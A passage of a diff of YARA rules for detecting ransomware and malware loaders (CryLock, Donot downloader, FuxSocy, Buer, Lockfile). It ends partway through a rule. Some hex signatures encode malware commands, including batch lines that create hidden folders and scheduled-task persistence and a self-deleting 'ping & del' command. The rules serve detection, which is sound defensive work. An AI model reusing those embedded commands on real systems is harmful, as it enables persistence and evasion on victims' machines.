+rule ARKBIRD_SOLG_RAN_Crylock_Oct_2020_1 : FILE
+{
+	meta:
+		description = "Detect CryLock ransomware V2.0.0"
+		author = "Arkbird_SOLG"
+		id = "642211e0-b5fe-5842-ab16-ca1fc8d00ac0"
+		date = "2020-10-14"
+		modified = "2020-10-15"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1316426560803680257"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-15/Crylock/RAN_CryLock_Oct_2020_1.yar#L1-L31"
+		license_url = "N/A"
+		logic_hash = "5d9aae41283c5738f2e584ea8d236ae64f7615ec629f9513fddb611714ddc230"
+		score = 75
+		quality = 71
+		tags = "FILE"
+		hash1 = "04d8109c6c78055d772c01fefe1e5f48a70f2a65535cff17227b5a2c8506b831"
+
+	strings:
+		$s1 = "All commands sended to execution" fullword ascii
+		$s2 = "Processesblacklist1" fullword ascii
+		$s3 = "Execute all" fullword ascii
+		$s4 = "config.txt" fullword ascii
+		$debug1 = "Processed files: " fullword ascii
+		$debug2 = "Next -->" fullword ascii
+		$debug3 = "Status: scan network" fullword ascii
+		$debug4 = { 49 45 28 41 4c 28 22 25 73 22 2c 34 29 2c 22 41 4c 28 5c 22 25 30 3a 73 5c 22 2c 33 29 22 2c 22 4a 4b 28 5c 22 25 31 3a 73 5c 22 2c 5c 22 25 30 3a 73 5c 22 29 22 29 }
+		$debug5 = { 4a 75 6d 70 49 44 28 22 22 2c 22 25 73 22 29 }
+		$debug6 = { 45 6e 63 72 79 70 74 65 64 20 62 79 20 42 6c 61 63 6b 52 61 62 62 69 74 2e 20 28 [3-10] 29 }
+		$ran1 = "w_to_decrypt.hta" wide
+		$ran2 = "<%UNDECRYPT_DATETIME%>" fullword ascii
+		$ran3 = "<%START_DATETIME%>" fullword ascii
+		$ran4 = "<%MAIN_CONTACT%>" fullword ascii
+		$ran5 = "<%RESERVE_CONTACT%>" fullword ascii
+		$ran6 = "<%HID%>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and 2 of ( $EWS* ) and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 300KB and 3 of ( $s* ) and 4 of ( $debug* ) and 4 of ( $ran* )
 }
-rule ARKBIRD_SOLG_RAN_ELF_Hellokitty_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Donot_Downloader_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect HelloKitty ransomware"
+		description = "Detect the trojan downloader used by Donot group"
 		author = "Arkbird_SOLG"
-		id = "3e83f07a-0ee7-5381-9aba-2606c01b9d91"
-		date = "2021-08-14"
-		modified = "2021-08-14"
+		id = "251a809e-9e36-5c46-955f-006531bd9619"
+		date = "2020-05-09"
+		modified = "2021-05-09"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-14/HelloKitty/RAN_ELF_HelloKitty_Aug_2021_1.yara#L1-L17"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-09/Donot/APT_Donot_Downloader_May_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "99816756ea0a680eb25da192c9f069082f6479befe4e50188ad8f90b323d1f2d"
+		logic_hash = "df64ab97b74935ce8b73c3854eb81fa1dbd4e59b1e27c43ae9c85b90aaaef6f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "ca607e431062ee49a21d69d722750e5edbd8ffabcb54fa92b231814101756041"
-		hash2 = "b4f90cff1e3900a3906c3b74f307498760462d719c31d008fc01937f5400fb85"
+		hash1 = "28aa296bda12f0184564c5f6b46e679f07255aa8df58b861ea17910cdcaa674a"
+		hash2 = "03730cdc23a3d10c8752ad1464ff2e68a64c69f8310b0ceea4d52b1db0215dfc"
+		hash3 = "edd590c343570f7576aca83da58967e058585c6ba861682dca2fc987c713ee3a"
 		tlp = "White"
-		adversary = "RAAS"
+		adversary = "Donot"
 
 	strings:
-		$seq1 = { 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 05 ?? 13 21 00 48 8b 3d ?? 14 21 00 48 89 e9 ba ?? 0c 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e2 ff ff 48 8b 3d ?? 14 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 05 ?? 13 21 00 48 8b 3d ?? 12 21 00 48 89 e9 ba ?? 0c 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e2 ff ff 48 8b 05 [2] 21 00 b9 ?? 0c 41 00 ba 80 00 00 00 be 01 00 00 00 4c 89 e7 48 8b 04 18 44 8b 00 31 c0 e8 ?? e5 ff ff 4c 89 e7 e8 cd 10 00 00 48 85 c0 49 89 c7 0f 84 9b 00 00 00 48 83 3d ?? 13 21 00 00 74 60 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 ?? e3 ff ff 48 8b 05 ?? 12 21 00 48 8b 3d ?? 13 21 00 48 89 e9 ba [2] 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e1 ff ff 48 8b 3d ?? 13 21 00 e8 ?? e6 ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 05 ?? 12 21 00 48 8b 3d [2] 21 00 48 89 e9 ba [2] 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e1 ff ff }
-		$seq2 = { 31 c0 b9 40 00 00 00 48 89 ef f3 ab be ?? 0d 41 00 48 89 df e8 [2] ff ff 48 85 c0 49 89 c5 0f 84 4c 01 00 00 48 89 c2 48 89 de 48 89 ef 48 29 da e8 71 07 00 00 be 3a 00 00 00 48 89 ef e8 [2] ff ff 48 8d 78 01 e8 [2] ff ff 85 c0 41 89 c7 0f 84 04 01 00 00 bf 10 00 00 00 e8 ?? dd ff ff 4c 89 ef 44 89 38 49 89 c6 48 89 04 24 e8 3d f5 ff ff 48 83 3d ?? 0e 21 00 00 49 89 46 08 74 6f 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 04 24 48 8b 0d ?? 0d 21 00 ba ?? 0d 41 00 48 2b 0d ?? 0d 21 00 48 8b 3d ?? 0e 21 00 be 01 00 00 00 4c 8b 48 08 44 8b 00 31 c0 48 c1 f9 03 48 ff c1 e8 ?? dc ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 04 24 48 8b 0d [2] 21 00 be 01 00 00 00 48 2b 0d [2] 21 00 48 8b 3d ?? 0c 21 00 ba ?? 0d 41 00 4c 8b 48 08 44 8b 00 31 c0 48 c1 f9 03 48 ff c1 e8 [2] ff ff 48 8b 35 [2] 21 00 48 3b 35 [2] 21 00 74 16 48 85 f6 74 07 48 8b 04 24 48 89 06 48 83 05 [2] 21 00 08 eb 0d 48 89 e2 bf e0 49 61 00 e8 af 02 00 00 48 8d 7b 01 be ?? 0d 41 00 e8 ?? dd ff ff 48 89 c3 e9 86 fe ff ff 4d 85 e4 74 08 4c 89 e7 e8 [2] ff ff 48 83 3d ?? 0d 21 00 00 74 61 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 0d ?? 0c 21 00 48 2b 0d ?? 0c 21 00 ba ?? 0d 41 00 48 8b 3d ?? 0d 21 00 be 01 00 00 00 31 c0 48 c1 f9 03 e8 ?? db ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 0d ?? 0c 21 00 48 2b 0d [2] 21 00 31 c0 48 8b 3d ?? 0b 21 00 ba ?? 0d 41 00 be 01 00 00 00 48 c1 f9 03 e8 [2] ff ff 48 8b 84 24 18 01 00 00 64 48 33 04 25 28 00 00 }
-		$seq3 = { 48 8d b4 24 90 00 00 00 bf d0 4a 61 00 48 c7 84 24 98 00 00 00 00 00 00 00 48 c7 84 24 90 00 00 00 01 00 00 00 e8 [2] ff ff e8 ?? 22 00 00 89 44 24 08 8b 05 [2] 21 00 89 d9 44 8b 0d [2] 21 00 44 8b 05 [2] 21 00 ba ?? 0e 41 00 48 8b 3d [2] 21 00 be 01 00 00 00 89 04 24 31 c0 e8 ?? f8 ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 31 f6 ba 0a 00 00 00 bf 40 4a 61 00 e8 ?? fa ff ff ba 0a 00 00 00 31 f6 bf 20 4a 61 00 e8 ?? fa ff ff be 01 00 00 00 bf 11 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 14 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 16 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 15 00 00 00 e8 [2] ff ff 83 3d ?? 28 21 00 00 }
+		$seq1 = { 65 63 68 6f 20 6f 66 66 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 64 65 6c 20 2f 66 20 25 73 20 0a 20 53 45 54 20 2f 41 20 25 25 43 4f 4d 50 55 54 45 52 4e 41 4d 45 25 25 20 0a 20 53 45 54 20 2f 41 20 52 41 4e 44 3d 25 25 52 41 4e 44 4f 4d 25 25 20 31 30 30 30 30 20 2b 20 32 20 0a 20 65 63 68 6f 20 25 25 43 4f 4d 50 55 54 45 52 4e 41 4d 45 25 25 2d 25 25 52 41 4e 44 25 25 20 3e 3e 20 25 73 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 4d 6f 62 55 70 64 61 74 65 20 2f 66 20 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 54 61 73 6b 55 70 64 61 74 65 20 2f 66 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 4d 61 63 68 69 6e 65 43 6f 72 65 20 2f 66 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 73 63 20 6d 69 6e 75 74 65 20 2f 6d 6f 20 32 30 20 2f 66 20 2f 74 6e 20 54 61 73 6b 55 70 64 61 74 65 20 2f 74 72 20 25 73 20 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 73 63 20 6d 69 6e 75 74 65 20 2f 6d 6f 20 31 30 20 2f 66 20 2f 74 6e 20 4d 61 63 68 69 6e 65 43 6f 72 65 20 2f 74 72 20 25 73 20 0a 20 6d 6f 76 65 20 25 25 41 50 50 44 41 54 41 25 }
+		$seq2 = { c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 00 00 00 00 c7 04 24 ?? 42 [2] e8 ?? 01 00 00 83 ec 14 [0-3] c7 44 24 14 00 00 00 00 c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 [2-5] 24 04 [0-3] 89 04 24 e8 ?? 01 00 00 83 ec 18 89 [1-9] c7 44 24 04 ?? 43 [2] c7 04 24 ?? 61 [2] e8 ?? 08 00 00 }
+		$s1 = "VirtualQuery failed for %d bytes at address %p" fullword ascii
+		$s2 = { 25 73 5c [1-14] 2e 62 61 74 }
+		$s3 = { 25 73 5c [1-14] 25 }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and filesize > 20KB and all of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and all of ( $seq* ) and 2 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Crylock_July_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Fuxsocy_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect CryLock ransomware (ex-Cryakl)"
+		description = "Detect FuxSocy ransomware"
 		author = "Arkbird_SOLG"
-		id = "350bd622-f4b5-5837-a239-dc506b100aef"
-		date = "2021-07-17"
-		modified = "2021-07-17"
-		reference = "https://twitter.com/BushidoToken/status/1415958829318217730"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-16/Crylock/RAN_Crylock_July_2021_1.yara#L1-L23"
+		id = "2420c2fa-bc94-51a6-87ab-4e8d226fdd23"
+		date = "2020-05-09"
+		modified = "2021-05-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-09/FuxSocy/RAN_FuxSocy_May_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "4f5046a64e7491085a55d8d1f2b5b056dc0aa89fcdea47652ecb7db680de2f59"
+		logic_hash = "ab34f95d2b12bdf2d362538e880301542c3308fff427cfb5ee59e9dca89ec033"
 		score = 75
-		quality = 65
+		quality = 75
 		tags = "FILE"
-		hash1 = "a962501ea4cd363dd588c948ff8b0ab24aa4132ff58f4a7806af06efa3b791ef"
-		hash2 = "1c2975dd464d014502a46ba6383943c7de4635e3664011653217dc424d53f8fe"
-		hash3 = "e001f6a5b2d4d2659b010fb5825eb4383e8f415861a244329bc70cfcd18da507"
+		hash1 = "d786355c1b3dc741103873aed46d8ffa3430d113a27482f37f3ffc7c978747f6"
+		hash2 = "43bbfb3389deb3846bba19a8ab2e9c8fd9b581720962b8170d4a63ad816b5804"
 		tlp = "White"
-		adversary = "RAAS"
+		adversary = "-"
 
 	strings:
-		$s1 = { 2f 63 20 22 70 69 6e 67 20 30 2e 30 2e 30 2e 30 26 64 65 6c 20 22 }
-		$s2 = { 7b 45 4e 43 52 59 50 54 53 54 41 52 54 7d 7b }
-		$s3 = { 7b 45 4e 43 52 59 50 54 45 4e 44 45 44 7d }
-		$s4 = { 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 45 58 54 45 4e 41 54 49 4f 4e 53 5c 5c 5c 00 ff ff ff ff 17 00 00 00 2f 2f 2f 45 4e 44 20 43 4f 4d 4d 41 4e 44 53 20 4c 49 53 54 5c 5c 5c 00 ff ff ff ff 1d 00 00 00 2f 2f 2f 45 4e 44 20 50 52 4f 43 45 53 53 45 53 20 4b 49 4c 4c 20 4c 49 53 54 5c 5c 5c 00 00 00 ff ff ff ff 1c 00 00 00 2f 2f 2f 45 4e 44 20 53 45 52 56 49 43 45 53 20 53 54 4f 50 20 4c 49 53 54 5c 5c 5c 00 00 00 00 ff ff ff ff 1e 00 00 00 2f 2f 2f 45 4e 44 20 50 52 4f 43 45 53 53 45 53 20 57 48 49 54 45 20 4c 49 53 54 5c 5c 5c 00 00 ff ff ff ff 1e 00 00 00 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 46 49 4c 45 53 20 4c 49 53 54 5c 5c 5c 00 00 ff ff ff ff 20 00 00 00 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 46 4f 4c 44 45 52 53 20 4c 49 53 54 5c 5c 5c }
-		$s5 = { 49 45 28 41 4c 28 22 25 73 22 2c 34 29 2c 22 41 4c 28 5c 22 25 30 3a 73 5c 22 2c 33 29 22 2c 22 4a 4b 28 5c 22 25 31 3a 73 5c 22 2c 5c 22 25 30 3a 73 5c 22 29 22 29 }
-		$s6 = { 3c 25 55 4e 44 45 43 52 59 50 54 5f 44 41 54 45 54 49 4d 45 25 3e }
-		$s7 = { 25 00 73 00 20 00 28 00 25 00 73 00 2c 00 20 00 6c 00 69 00 6e 00 65 00 20 00 25 00 64 00 29 }
+		$seq1 = { b8 48 14 00 00 e8 b8 83 00 00 53 55 56 8d 44 24 48 8b e9 50 55 89 54 24 14 33 f6 ff 15 84 02 41 00 8b d8 85 db 0f 84 fa 00 00 00 57 8b cb e8 2b 09 00 00 8b f8 85 ff 0f 84 e7 00 00 00 57 53 56 55 ff 15 8c 02 41 00 8b 1d 78 02 41 00 8d 44 24 18 50 8d 44 24 18 50 68 cc 14 48 00 57 89 74 24 24 89 74 24 28 ff d3 83 7c 24 18 04 0f 82 ab 00 00 00 8b 44 24 10 8b 4c 24 14 c7 44 24 1c 00 15 48 00 c7 44 24 20 14 15 48 00 c7 44 24 24 30 15 48 00 c7 44 24 28 48 15 48 00 c7 44 24 2c 60 15 48 00 c7 44 24 30 80 15 48 00 c7 44 24 34 a0 15 48 00 c7 44 24 38 c0 15 48 00 c7 44 24 3c e0 15 48 00 c7 44 24 40 fc 15 48 00 c7 44 24 44 14 16 48 00 c7 44 24 48 38 16 48 00 ff 74 84 1c 0f b7 41 02 50 0f b7 01 50 8d 44 24 60 68 54 16 48 00 50 ff 15 64 02 41 00 83 c4 14 8d 44 24 50 50 8d 44 24 14 50 8d 44 24 5c 50 57 ff d3 85 c0 74 0d 8b 4c 24 10 33 d2 e8 47 0a 00 00 8b f0 8b cf e8 c9 08 00 00 5f 8b c6 5e 5d 5b 81 c4 48 14 00 00 }
+		$seq2 = { 8d 44 24 50 50 8d 44 24 4c 50 8d 44 24 2c 50 55 ff 15 ec 00 41 00 8b 44 24 14 8b 74 24 18 ff 74 24 68 88 87 57 01 08 00 66 a1 80 4d 41 00 [10] 88 9f 54 01 08 00 c6 87 63 01 08 00 10 89 b7 58 01 08 00 66 89 87 5d 01 08 00 ff 15 6c 00 41 00 0f b6 97 63 01 08 00 03 c0 66 89 87 55 01 08 00 8b 44 24 20 8d 8f 64 01 08 00 88 87 5c 01 08 00 e8 14 2b 00 00 8b 44 24 14 0f b6 c8 0f b7 87 55 01 08 00 83 c1 03 8d 0c c8 89 8f 4c 01 08 00 e8 2e 3a 00 00 8b c8 89 8f 48 01 08 00 85 c9 0f 84 0f 01 00 00 8b 44 24 28 89 41 04 8b 8f 48 01 08 00 8b 44 24 24 89 01 8b 8f 48 01 08 00 8b 44 24 4c 89 41 0c 8b 8f 48 01 08 00 8b 44 24 48 89 41 08 8b 8f 48 01 08 00 8b 44 24 54 89 41 14 8b 8f 48 01 08 00 8b 44 24 50 89 41 10 0f b7 87 55 01 08 00 50 8b 87 48 01 08 00 ff 74 24 6c 83 c0 18 50 e8 b4 b5 00 00 8b 4c 24 6c 33 d2 e8 bd 3b 00 00 8b 4c 24 70 33 d2 89 47 08 e8 af 3b 00 00 0f b6 97 63 01 08 00 89 47 0c 8b 44 24 78 89 87 28 02 08 00 8b 44 24 44 89 47 04 8d 87 44 00 08 00 50 8d 8f 64 01 08 00 89 2f e8 4d 24 00 00 89 b7 18 02 08 00 8b 87 c5 01 08 00 f7 a7 58 01 08 00 8b c8 0f b6 87 5c 01 08 00 8b f2 99 83 c4 10 ff b7 28 02 08 00 03 c8 13 f2 03 0d 80 4d 41 00 13 35 84 4d 41 00 89 8f 1c 02 08 00 89 b7 20 02 08 00 ff 15 c4 00 41 00 53 57 ff 74 24 44 55 ff 15 e8 00 41 00 }
+		$seq3 = { 57 68 ff 01 0f 00 ff 75 08 8b fa 51 32 db ff 15 0c 00 41 00 8b f0 85 f6 74 76 32 ff eb 52 84 ff 75 65 33 c0 50 50 50 50 50 50 50 6a ff 6a 04 6a ff 56 ff 15 10 00 41 00 8b 45 c0 83 f8 01 74 2c 76 2e 83 f8 03 76 1a 83 f8 04 75 24 8d 45 e0 50 6a 01 56 ff 15 18 00 41 00 }
+		$seq4 = { 6a ff 8d 45 fc 50 8d 45 08 50 8d 45 f8 50 ff 33 33 ff 89 7d f8 89 7d 08 89 7d fc ff 15 c8 00 41 00 85 c0 8b 45 08 0f 95 c1 85 c0 74 59 56 }
+		$seq5 = { 8b 45 08 56 ff 70 08 ff 15 dc 00 41 00 8b ce e8 af 2e 00 00 33 ff 57 ff 75 08 57 ff 33 ff 15 e4 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 3 of ( $seq* )
 }
-rule ARKBIRD_SOLG_Ran_Buran_Oct_2020_1 : FILE
+rule ARKBIRD_SOLG_Loader_Buer_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect Buran ransomware"
+		description = "Detect Buer loader"
 		author = "Arkbird_SOLG"
-		id = "dbdc251e-9ac6-5de1-8a72-72ac159daf4c"
-		date = "2020-11-05"
-		modified = "2020-11-06"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1323956405976600579"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-06/Buran/Ran_Buran_Oct_2020_1.yar#L1-L22"
+		id = "a2883eca-d576-53ba-aa97-5e3c94f501a5"
+		date = "2020-12-01"
+		modified = "2020-12-01"
+		reference = "https://twitter.com/James_inthe_box/status/1333551419735953409"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-01/Buer/Mal_Buer_Nov_2020_1.yar#L35-L64"
 		license_url = "N/A"
-		logic_hash = "a6984d21451c980d001e040325c66b547060653ac97556bc379da40f3ab6a70a"
+		logic_hash = "96a74b497076be170ce6138189501d8b3a1002bcf07f9d3cf662d64612d04a59"
 		score = 75
-		quality = 75
+		quality = 55
 		tags = "FILE"
-		hash1 = "66fc6e71a9c6be1f604c4a2d0650914f67c45d894fd1f76913e463079d47a8af"
-		hash2 = "93fe277d54f4baac5762412dda6f831bf6a612f166daade7c23f6b38feac94fb"
-		hash3 = "b3302c4a9fd06d9fde96c9004141f80e0a9107a9dead1659e77351f1b1c87cf6"
-		hash4 = "eb920e0fc0c360abb901e04dce172459b63bbda3ab8152350885db4b44d63ce5"
-		hash5 = "f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb"
-		hash6 = "29cdd5206422831334afa75c113b615bb8e0121254dd9a2196703ce6b1704ff8"
+		hash1 = "2824d4b0e5a502416696b189bd840870a19dfd555b53535f20b0c87c95f4c232"
+		hash2 = "a98abbce5e84c4c3b67b7af3f9b4dc9704b5af33b6183fb3c192e26b1e0ca005"
+		hash3 = "ae3ac27e8303519cf04a053a424a0939ecc3905a9a62f33bae3a29f069251b1f"
 
 	strings:
-		$s1 = "!!! LOCALPUBKEY !!!" fullword ascii
-		$s2 = "!!! ENCLOCALPRIVKEY !!!" fullword ascii
-		$s3 = "!!! D !!!" fullword ascii
-		$s4 = { 8b 85 74 fd ff ff 8b 40 04 85 c0 74 05 83 e8 04 8b 00 8d 55 f4 92 e8 c1 aa fe ff 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8d 45 f4 e8 d3 a8 fe ff 8b d0 8b cf 8b 85 50 fd ff ff 8b 38 ff 57 0c 6a 00 6a 00 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 45 f4 8b 95 74 fd ff ff 8b 52 04 e8 da a7 fe ff 0f 84 7d 07 00 00 ff b5 4c fd ff ff ff b5 48 fd ff ff 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8b 85 74 fd ff ff 83 c0 04 e8 63 a8 fe ff 8b d0 8b cf 8b 85 50 fd ff ff 8b 38 ff 57 10 6a 00 6a 00 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8b 85 50 fd ff ff 8b 10 ff 12 52 50 8b c7 99 03 85 48 fd ff ff 13 95 4c fd ff ff 3b 54 24 04 75 03 3b 04 24 5a 58 0f 85 dc 06 00 00 ff b5 4c fd ff ff ff b5 48 fd ff ff 8b 85 50 fd ff ff e8 e6 cc fe ff 8b 85 74 fd ff ff 8b 40 28 85 c0 74 09 83 f8 0a 0f 85 00 01 00 00 8b 85 74 fd ff ff 83 c0 1c e8 fe a2 fe ff 8b 85 74 fd ff ff 83 c0 20 e8 f0 a2 fe ff c7 85 44 fd ff ff 01 00 00 00 b8 00 01 00 00 e8 78 44 ff ff 8b d0 8d 85 10 fd ff ff e8 b7 a4 fe ff 8b 95 10 fd ff ff 8b 85 74 fd ff ff 83 c0 20 e8 63 a5 fe ff 83 bd 44 fd ff ff 10 7f 2b b8 00 01 00 00 e8 44 44 ff ff 8b d0 8d 85 0c fd ff ff e8 83 a4 fe ff 8b 95 0c fd ff ff 8b 85 74 fd ff ff 83 c0 1c e8 2f a5 fe ff ff 85 44 fd ff ff 83 bd 44 fd ff ff 21 75 92 8b 85 74 fd ff ff 83 c0 24 50 8b 85 74 fd ff ff 8b 48 1c 8b 85 74 fd ff ff 8b 50 20 8d 85 08 fd ff ff e8 45 a5 fe ff 8b 85 08 fd ff ff 8b 95 74 fd ff ff 8d 4a 0c 8b 95 74 fd ff ff 83 c2 14 e8 c8 8f ff ff 8d 95 04 fd ff ff 8b 85 74 fd ff ff 8b 40 24 e8 0c 5c ff ff 8b 95 04 fd ff ff 8b 85 74 fd ff ff 83 c0 24 e8 60 a2 fe ff 8b 85 74 fd ff ff 83 78 28 0a 75 0d 8b 85 74 fd ff ff 33 d2 89 50 28 eb 09 8b 85 74 fd ff ff ff 40 28 8b c3 99 52 50 8b 85 48 fd ff ff 8b 95 4c fd ff ff e8 54 b2 fe ff 89 85 38 fd ff ff 89 95 3c fd ff ff 8b c3 99 52 50 8b 85 38 fd ff ff 8b 95 3c fd ff ff e8 0e b2 fe ff 52 50 8b c6 99 3b 54 24 04 75 09 3b 04 24 5a 58 73 18 eb 04 5a 58 7d 12 8b c6 99 f7 fb 99 89 85 38 fd ff ff 89 95 3c fd ff ff 83 bd 3c fd ff ff 00 75 07 83 bd 38 fd ff ff 00 74 31 ff b5 3c fd ff ff ff b5 38 fd ff ff 8b 85 48 fd ff ff 8b 95 4c fd ff ff e8 d9 b1 fe ff 89 85 30 fd ff ff 89 95 34 fd ff ff 89 9d 2c fd ff ff eb 38 c7 85 38 fd ff ff 01 00 00 00 c7 85 3c fd ff ff 00 00 00 00 8b 85 48 fd ff ff 89 85 30 fd ff ff 8b 85 4c fd ff ff 89 85 34 fd ff ff 8b 85 48 fd ff ff 89 85 2c fd ff ff 8d 45 f0 e8 05 a1 fe ff b2 01 a1 98 6f 40 00 e8 61 94 fe ff 89 85 1c fd ff ff 8b 9d 38 fd ff ff 85 db 0f 8e 9f 00 00 00 c7 85 44 fd ff ff 01 00 00 00 ff b5 34 fd ff ff ff b5 30 fd ff ff 8b 85 44 fd ff ff 48 99 e8 1e b1 fe ff 89 85 20 fd ff ff 89 95 24 fd ff ff 8d 95 20 fd ff ff b9 08 00 00 00 8b 85 1c fd ff ff 8b 30 ff 56 10 ff b5 24 fd ff ff ff b5 20 fd ff ff 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8d 45 f4 8b 95 2c fd ff ff e8 19 a7 fe ff 8d 45 f4 e8 3d a5 fe ff 8b d0 8b 8d 2c fd ff ff 8b 85 50 fd ff ff e8 e6 ca fe ff 8d 45 f0 8b 55 f4 e8 fb a2 fe ff ff 85 44 fd ff ff 4b 0f 85 6b ff ff ff 6a 00 6a 00 33 d2 8b 85 1c fd ff ff 8b 08 ff 51 18 8d 45 ec e8 2d a0 fe ff 8b 85 1c fd ff ff 8b 10 ff 12 89 85 18 fd ff ff 8d 45 ec 8b 95 18 fd ff ff e8 af a6 fe ff 8d 45 ec e8 d3 a4 fe ff 8b d0 8b 8d 18 fd ff ff 8b 85 1c fd ff ff 8b 18 ff 53 }
-		$s5 = ": :(:,:0:4:8:<:@:D:H:\\:|:" fullword ascii
-		$s6 = " remove '.' from {.$DEFINE ComplexBraces}" fullword ascii
+		$s1 = "bcdfghklmnpqrstvwxz" fullword ascii
+		$s2 = "%02x" fullword wide
+		$s3 = "{%s-%d-%d}" fullword wide
+		$s4 = "update" fullword wide
+		$s5 = "]otju}y&Ykx|kx&867?5Ykx|kx&867<" fullword ascii
+		$s6 = "]otju}y&Ykx|kx&8678&X8" fullword ascii
+		$s7 = "]otju}y&\\oyzg5Ykx|kx&857>" fullword ascii
+		$s8 = "]otju}y&>47" fullword ascii
+		$s9 = "]otju}y&Ykx|kx&8678" fullword ascii
+		$s10 = "]otju}y&=" fullword ascii
+		$s11 = "Iutzktz3Z" fullword ascii
+		$s12 = "g|mnuuq~4jrr" fullword ascii
+		$s13 = "RegularModules" fullword ascii
+		$s14 = "]otju}y&>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and 8 of them
 }
-rule ARKBIRD_SOLG_Ran_Loader_Hades_Dec_2020_1 : FILE
+rule ARKBIRD_SOLG_RAN_Lockfile_Packed_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect the loader used by Hades ransomware for load the final implant in memory"
+		description = "Detect lockfile ransomware (Packed version)"
 		author = "Arkbird_SOLG"
